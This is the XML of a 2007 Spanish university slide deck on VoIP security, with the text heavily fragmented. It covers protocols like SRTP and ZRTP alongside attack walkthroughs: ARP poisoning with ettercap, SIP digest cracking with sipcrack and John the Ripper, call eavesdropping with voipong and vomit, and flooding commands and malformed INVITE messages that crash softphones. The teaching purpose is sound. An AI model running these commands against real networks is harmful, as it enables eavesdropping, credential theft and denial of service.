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907588" cy="6858000"/>
  <p:notesSz cx="4279900" cy="548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840" y="443412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90040" y="191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7840" y="443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90040" y="443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11080" y="191412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74320" y="191412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47840" y="443412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11080" y="443412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74320" y="443412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47840" y="191412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0040" y="191412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39800" y="853560"/>
            <a:ext cx="86025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0040" y="191412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7840" y="443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91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90040" y="443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91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0040" y="191412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840" y="443412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74240" cy="7559640"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10074240" cy="7559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074240" cy="7559640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 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074240" cy="75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10074240" cy="7559640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 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4613400" y="30193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6864480"/>
            <a:ext cx="9360000" cy="1440"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom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82480" y="111240"/>
            <a:ext cx="1806840" cy="396360"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29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iversidad de De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cultad de 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10077480" cy="70632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3600" y="177840"/>
            <a:ext cx="2955600" cy="283680"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 36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uridad en Telefonía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0"/>
            <a:ext cx="3962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iversidad de Deust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.    .    .    .    .    .    .  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1280" y="71280"/>
            <a:ext cx="376560" cy="530280"/>
            <a:chOff x="71280" y="71280"/>
            <a:chExt cx="376560" cy="530280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="11" name=""/>
            <p:cNvGraphicFramePr/>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="71280" y="71280"/>
            <a:ext cx="376560" cy="53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280" y="71280"/>
                      <a:ext cx="37656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" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="71280" y="71280"/>
              <a:ext cx="376560" cy="530280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 360 w 376560"/>
                <a:gd name="textAreaRight" fmla="*/ 376200 w 376560"/>
                <a:gd name="textAreaTop" fmla="*/ 360 h 530280"/>
                <a:gd name="textAreaBottom" fmla="*/ 529920 h 530280"/>
              </a:gdLst>
              <a:ahLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="21600" h="30409">
                  <a:moveTo>
                    <a:pt x="90" y="0"/>
                  </a:moveTo>
                  <a:arcTo wR="90" hR="90" stAng="16200000" swAng="-5400000"/>
                  <a:lnTo>
                    <a:pt x="0" y="30319"/>
                  </a:lnTo>
                  <a:arcTo wR="90" hR="90" stAng="10800000" swAng="-5400000"/>
                  <a:lnTo>
                    <a:pt x="21510" y="30409"/>
                  </a:lnTo>
                  <a:arcTo wR="90" hR="90" stAng="5400000" swAng="-5400000"/>
                  <a:lnTo>
                    <a:pt x="21600" y="90"/>
                  </a:lnTo>
                  <a:arcTo wR="90" hR="9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360360" y="6864480"/>
            <a:ext cx="9360000" cy="1440"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom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853560"/>
            <a:ext cx="8602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47840" y="191412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334960"/>
            <a:ext cx="7740360" cy="21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Seguridad en VoIP</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="6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ulnerabilidades y medidas de protecció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2575080"/>
            <a:ext cx="86058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181480"/>
            <a:ext cx="5634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blo Garaizar Sagarmin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raizar@eside.deusto.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R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cure Real-time Transport Protoc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fine un perfil de RTP con la intención de proporcionar cifrado, autenticación del mensaje e integridad, y protección contra reenvíos a los datos RTP en aplicaciones unicast y multic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e publicado por primera vez por el IETF en marzo de 2004 como el RFC 37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R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RTP es una extensión de RTP que describe el establecimiento de un intercambio Diffie-Hellman de claves para SRT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e enviado al IETF por Phil Zimmermann, Jon Callas y Alan Johnston el 5 de marzo 200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R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alidades de ZR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requiere el intercambio previo de otros secretos compartidos o una Infraestructura de Clave Pública (P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ita ataques de man-in-the-midd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delega en la señalización SIP para la gestión de claves ni en ningún servi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porta encriptación oportunística detectando automáticamente si el cliente VoIP del otro lado soporta ZR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ZRTP puede usarse con cualquier protocolo de señalización como SIP, H.323, Jabber, y Peer-to-Peer S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RTP es independiente de la capa de señalización, puesto que realiza toda su negociación de claves dentro del flujo de datos R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ridad en Voz sobre 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ulnerabilidades en Vo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uptura de protocolos de autenticación usados en VoIP (HTTP-Dig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tura de tráfico Vo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cuestro de se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tención del CallerID ocul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aques de Denegación de Servicio (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aques a termi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aques en redes VoWiFi (VoIP sobre WiF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PIT: Spam over IP Teleph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ridad en Voz sobre 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didas de seguridad en Vo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canismos de gestión de cla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s: Pre-Shared key, Public key, Diffie-Hell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ocolos para VoIP: MI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frado de los flujos de dat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R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Psec y Vo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TTP-Digest es el método de autenticación para Vo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ás senci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ás efic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cho de b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amiento (CP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ás inseguro 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genera un texto concreto (lo que se conoce como “digest”) como desafío y se envía al usuario que se quiere autenti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usuario lo cifra utilizando su contraseña y lo envía como respuest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el cifrado es correcto, el autenticador podrá descifrarlo correctamente al recibir la respuesta y compararlo con el “digest”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safío cifrado empleado se usa como base para calcular una PMK (Pre-Master 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ntro de un desafío existen varios campos diferenci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lm: identifica las credenciales dentro de un mensaje SIP. Normalmente es el dominio del cual el servidor proxy SIP es respons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qop: significa protección de la calidad. Especifica qué esquemas de protección soporta el servid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nce: string generado de forma única cada vez que un servidor genera un desafío “digest”. Se genera a partir de un dato arbitrario y una marca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aque: string similar a una SYNCook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gorithm: por el momento sólo está soportado MD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fí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igest realm="iptel.org", qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="", algorithm=MD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pues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igest username="jan", realm="iptel.org", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="sip:iptel.org", qop=auth, nc=00000001, cnonce="0a4f113b", response="6629fae49393a05397450978507c4ef1", opaque="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para cracking HTTP-Dig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NU/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cr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S Wind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in &amp; A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Voz sobre Protocolo de Internet, también llamado Voz sobre IP, VoIP, Telefonía IP, Telefonía por Internet, Telefonía Broadband y Voz sobre Broadband es el enrutamiento de conversaciones de voz sobre Internet o a través de alguna otra red basada en I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[Wikipedia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nología bastante rec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pesar de que en 1973 ya se comenzó con el experimental Network Voice Protocol, no es hasta los 90 cuando comienza a despe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Pcr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rramienta programada por Martin J. Münch (http://www.codito.de/) que incorpora dos programas difer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dump: para capturar el tráfico relativo a la autenticación SIP dentro de un fichero de t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crack: para atacar criptográficamente el desafío contenido en la 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Pcrack, u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P Poison para capturar el tráf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cho 1 &gt; /proc/sys/net/ipv4/ip_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tercap -o -T -P repoison_arp -M arp:remote /192.168.0.1/ /192.168.0.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tura de tráf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shark -i eth0 -w captura.pcap ip host 192.168.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tura de los desafíos s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pdump -f captura.pcap -d sip.p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pdump -i eth0 -d sip.pcap (hace los 2 pasos anteriores –captura de tráfico y de desafíos- en u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Pcrack, u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acking de dicciona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crack -d sip.pcap -w /usr/share/dict/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acking por fuerza bru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q 1 10000 | ./sipcrack -d sip.pcap –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acking con John the Ri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hn -i --stdout | ./sipcrack -d sip.pcap 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in &amp; Ab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ado por Massimiliano Montoro (http://www.oxid.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perador de contraseñas para sistemas operativos Microso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 ido incorporando múltiples funcionalidades a lo largo del tiempo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aques de ARP Poi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n-in-the-mid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álisis de tráfico HTTPS o SSHv1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re sus características también destaca su capacidad para atacar a HTTP-Digest dentro de paquetes S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in &amp; Abel, u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P Poi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samos el botón "Start/Stop Sniffer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samos el botón "Add to list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lizamos un escaneo automático y seleccionamos el cliente VoIP y la PB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ntro de la pestaña ARP Poison Routing, añadimos a los dos hosts involuc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in &amp; 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579760"/>
            <a:ext cx="6019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in &amp; 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pturar tráfico HTTP-Dig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pestaña Passwords vemos si se ha capturado al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ackear HTTP-Dig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leccionamos la contraseña capturada (pestaña Passwords), pulsamos botón derecho y elegimos “Send to Crack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TTP-Digest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in &amp; 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2558880"/>
            <a:ext cx="57913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cuestro de sesione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 realizar una petición REGISTER usando SIP, se puede poner una dirección SIP diferente para el From: y para el Contact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diante un ataque MiTM y software de reinyección de mensajes SIP (SiVuS, por ejemplo), podemos modificar la petición y recibir los mensajes y tráfico del cliente legít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ecuestro de sesione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93432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tiliza toda la infraestructura IP existe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ranets / Extranets /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arte conexión con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y barata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ctividad no basada en el tiempo o la dis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blemas de Q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oIP es mucho más exigente que el tráfico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s con el CallerID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una red PSTN, el Caller ID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 compañía telefónica envía tu número de teléfono en cada llamada (el CPN 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alling Party Numbe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, como si fuera el remitente en un sobre de cor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unto con el CPN se transmite un bit de privacidad que informa al conmutador telefónico del otro extremo si deseas compartir tu número con el receptor de la llamada o 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tienes activado el bloqueo de llamada, la compañía de teléfono a la que estás llamando sabe tu número, pero no lo mostrará a la persona a la que ll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oblemas con el CallerID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VoIP los elementos intermedios pueden ser no conf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terisk tuvo una vulnerabilidad en 2003 (CAN-2003-0779  Asterisk CallerID CDR SQL injection) que permitía conocer el CallerID incluso de los usuarios que deseaban ocult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ara realizar una escucha no autorizada en VoIP simplemente es necesario realizar los siguientes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dirigir y capturar el tráfico VoIP que resulte de inte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alizar los flujos de datos y generar un volcado a fichero de un flujo de datos contin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odificar el flujo de datos para convertirlo a un formato fácilmente reproduc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para la captura de tráfico Vo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NU/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e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IP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WireSh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S Wind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in &amp; A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e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ado por el equipo de Aud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modular y multiplataforma diseñado para obtener y almacenar flujos de datos de audio, así como de los metadatos implicados en esas transm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macena sesiones RTP de VoIP haciendo una escucha pasiva de los paque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dos lados de la conversación se mezclan juntos y cada llamada se almacena en un fichero sepa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 se detecta que la llamada ha empleado SIP o Skinny (SCCP), también son almacenados los metadatos de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porta múltiples códecs: A-Law, U-Law y GSM6.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r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u arquitectura modular hace que esté separado en tres servicios difer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kaudio, el servicio encargado de escuchar conversaciones VoIP y decodificarlas a ficheros W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kweb, que proporciona una interfaz de administración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ktrack, el servicio encargado de registrar las conversaciones VoIP en My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reka, u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nzar el daemon orkaud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# orkaudio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alizar las capturas realizadas en /var/log/orkaudio y tratarlas con Auda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IP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ado por Murat Balaban: http://www.enderunix.or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cta llamadas VoIP en una red y vuelca el contenido de las mismas en ficheros sepa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el códec empleado es G711 generará un fichero WAV, de lo contrario generará un fichero RAW de d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ualmente soporta SIP, H323, Cisco's Skinny Client Protocol, RTP y RT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 sido programado en C por razones de rendimiento y es código multiplata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IPong, u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voipong -f -d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EnderUNIX VOIPONG Voice Over IP Sniffer starting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Release 2.0, running on elektron [Linux 2.6.17-2-k7 #1 SMP Wed Sep 13 17:18:46 UTC 2006 i686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(c) Murat Balaban http://www.enderunix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EnderUNIX VOIPONG Voice Over IP Sniffer starting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Release 2.0 running on elektron [Linux 2.6.17-2-k7 #1 SMP Wed Sep 13 17:18:46 UTC 2006 i686]. (c) Murat Balaban http://www.enderunix.org/ [pid: 11483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Default matching algorithm: l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loadmodule: /usr/local/etc/voipong/modules/modvocoder_pcma.so (@0xa7fe222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loadmodule: /usr/local/etc/voipong/modules/modvocoder_pcmu.so (@0xa7fe020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loaded 2 modul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loadnetfile: fopen(): No such file or dir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10: eth0 has been opened in  promisc mode. (192.168.0.0/255.255.255.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48: created a call recorder instanc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49: [11492] VoIP call has been det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49: [11492] 192.168.0.2:10066 &lt;--&gt; 192.168.0.3:5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3:49: [11492] Encoding 3-GSM-8KHz, recording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4:22: [11492] maximum idle time [10 secs] has been elapsed for this call, the call might have been en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4:22: [11492] create_wave: no modules have been loaded to decode payload type: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4:22: [11492] create_wave: leaving *.raw files untouch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</a:rPr>
              <a:t>14/01/07 12:34:22: child [pid: 11492] terminated normally [exit code: 0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om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do por Niels Provos: http://vomit.xtdnet.n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ice Over Misconfigured Internet Teleph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vierte conversaciones realizadas mediante un teléfono IP CISCO a ficheros WAV fácilmente reproduc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onados con la Q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n necesidad de ancho de banda para los flujo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tardos (&lt; 300 ms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tencia: tiempo necesario para enviar los paquetes IP de voz de un punto a su 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itter: variabilidad de la lat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mpo de procesamiento si se emplean medidas de seguridad (SRTP, MIKEY, IPsec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onados con la arquitectura de red: NAT, servidores STU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omit, u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mit -r phone.dump -d eth0 | waveplay -S8000 -B16 -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in &amp; Ab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capaz de extraer diferentes parámetros de una sesión R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mbién puede capturar y decodificar los flujos de de datos de audio RTP codificados con los siguientes códe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711 uLaw, G771 aLaw, ADPCM, DVI4, LPC, GSM610, Microsoft GSM, L16, G729, Speex, iLBC, G723.1, G726-16, G726-24, G726-32, G726-40, LPC-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pués de ser decodificado, el audio es guardado en ficheros WAV mono o estéreo en el disco d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in &amp; Abel, u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figuramos ARP Poisoning y Sniff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onamos la pestaña VoIP y vemos las conversaciones Vo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tiempo real podemos pulsar botón derecho sobre ellas y escucharlas, o bien almacenarlas en el disco d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in &amp; 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9436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ireSha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pesar de ser un analizador genérico, las últimas versiones disponen de plugins para VoIP muy út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ntro de la opción “Statistics” del menú principal tenemos varias opciones para analizar la cap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 “VoIP Calls” podremos hacer un estudio detallado del tráfico obte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ireSha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85345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ireSha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87520" y="2603520"/>
            <a:ext cx="5232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tura de tráfico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ireSha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991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s redes VoIP son muy vulnerables a ataques D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requisitos de QoS son muy ex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lamente con provocar retardos el ataque es un éx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s medidas contra ataques DoS suponen latencias, en ocasiones inadmis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aques DoS específicos de Vo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turación mediante paquetes R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lformación en mensajes INVITE: con Content-Lengh negativo, mayor o igual a 1073741823 by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erre de la comunicación mediante mensajes B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erre de la comunicación mediante mensajes CANC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número de protocolos diferentes implicados en la VoIP es elev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tocolos de señalización: SIP, H.225.0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tocolos de streaming de datos: RTP, RTCP, SRTP, ZRT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tocolos de autenticación, seguridad, cifrado: MIKEY, S/MIME, T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milias de protocolos: H.323, que utiliza H.225.0, H.235, H.245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rramientas de generación de tráfico, fuzzers: SIPsak, SIPp o SiV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rramientas de ataques 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cripts (típicamente en Perl o Pyth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n específicamente alguno de los ataques ya coment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s: UDPflood, RTPflood, INVITEflood o Tear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PS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sak -F -s sip:6001@192.168.0.2 –vvv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P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p 192.168.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V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1941480"/>
            <a:ext cx="5486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DPfl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dpflood 192.168.0.3 192.168.0.2 5060 5060 1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TPfl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tpflood 192.168.0.3 192.168.0.2 8000 8002 1000000 15000 2000 18869869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fl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viteflood eth0 500 192.168.0.2 192.168.0.2 1000000 -a h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DoS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ard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ardown eth0 500 192.168.0.2 192.168.0.2 6113C052-4E28-2AAF-3FB6-5DC44A483EF9@192.168.0.3 400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AXfl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axflood 192.168.0.3 192.168.0.2 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P-k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p-kill.pl -ieth0 -m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MiTM en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 igual que en el resto de re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aques de ARP Poisoning sirven para hacer eavesdr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taques MiTM usando proxies S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P-Prox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rramienta similar a Proxomitron para HT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mite modificar en tiempo real los mensajes SIP entre el User Agent y el Proxy SIP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a terminales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tipos de ata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aques DoS: sobre todo con malformación en mensaj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ress Talk v.1.03: los mensajes INVITE  con Content-Lengh negativo provocan que la terminación anómala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lConductor v. 1.03: ocurre lo mismo que con Express Tal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-Lite 1103: si se envían mensajes INVITE con un valor de Content-Length mayor o igual a 1073741823 bytes, el rendimiento se degrada de forma notable, consumiendo toda la memoria RAM y Virtual disponible en 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a terminales Vo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os tipos de ataq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aques durante el aprovisionamiento (provisionin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tura de configuraciones (ej. Cisco CallManager, por TFT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rovisionamientos fals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aques a redes VoWiF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des VoWiFi: las redes más vulnerables de todas. Se su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ulnerabilidades conocidas de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ulnerabilidades WiF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tura de t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acking WEP y WPA-P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aques de desaso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inyección de t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ulnerabilidades Vo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quisitos exigentes de Vo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PIT es SPam over Ip Telephony,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spam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 través de Vo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s redes VoIP hay dos tipos de spam po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voz: mensajes comer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IM, mensajería instantán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l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sajes comer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ssion Initiation Protocol, protocolo del IETF para VoIP, texto y sesiones multi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tocolo de señalización de capa de aplicación para iniciación, modificación y terminación de sesiones de comunicación multimedia entre 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s soluciones actuales son similares a las empleadas contra el spam de correo electrón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PF: Sender Policy Fra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ain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eylists: listas g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y herramientas básicas de generación de SPI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pi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emplea conjuntamente con Asteri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preciso definir contextos y un dialplan para los spi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ualmente es beta y solamente se desarrolla con intereses educ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2680" y="2128320"/>
            <a:ext cx="84200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sentaciones y trabajos de Irontec, Sara Rincón, María Unda, David Castellanos, Gaizka Isusquiza, Marcelo Pellón, Digium, Cisco, KTH de Suecia, publicaciones en IEEE y ACM, O’Reilly, VoIP Hacking, Sy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das las imágenes son propiedad de sus respectivos due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P: Arquite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2603520"/>
            <a:ext cx="6858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P: Llam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38360" y="2590920"/>
            <a:ext cx="66294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800" y="1022400"/>
            <a:ext cx="86025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eve Introducción a Vo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205380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pesar del nombre, protocolo de nivel de apl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: transmitir información de audio y vídeo en tiemp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icialmente se publicó como protocolo multicast, aunque se ha usado en varias aplicaciones unic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usa frecuentemente en sistemas de streaming, junto a RTSP, videoconferencia y sistemas push to talk (en conjunción con H.323 o SI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resenta también la base de la industria de Vo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4:47:35Z</dcterms:created>
  <dc:creator>Pablo Garaizar Sagarminaga</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Administrador</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-07-17T19:10:42Z</dcterms:modified>
  <cp:revision>129</cp:revision>
  <dc:subject/>
  <dc:title>Seguridad Informatica</dc:title>
</cp:coreProperties>
</file>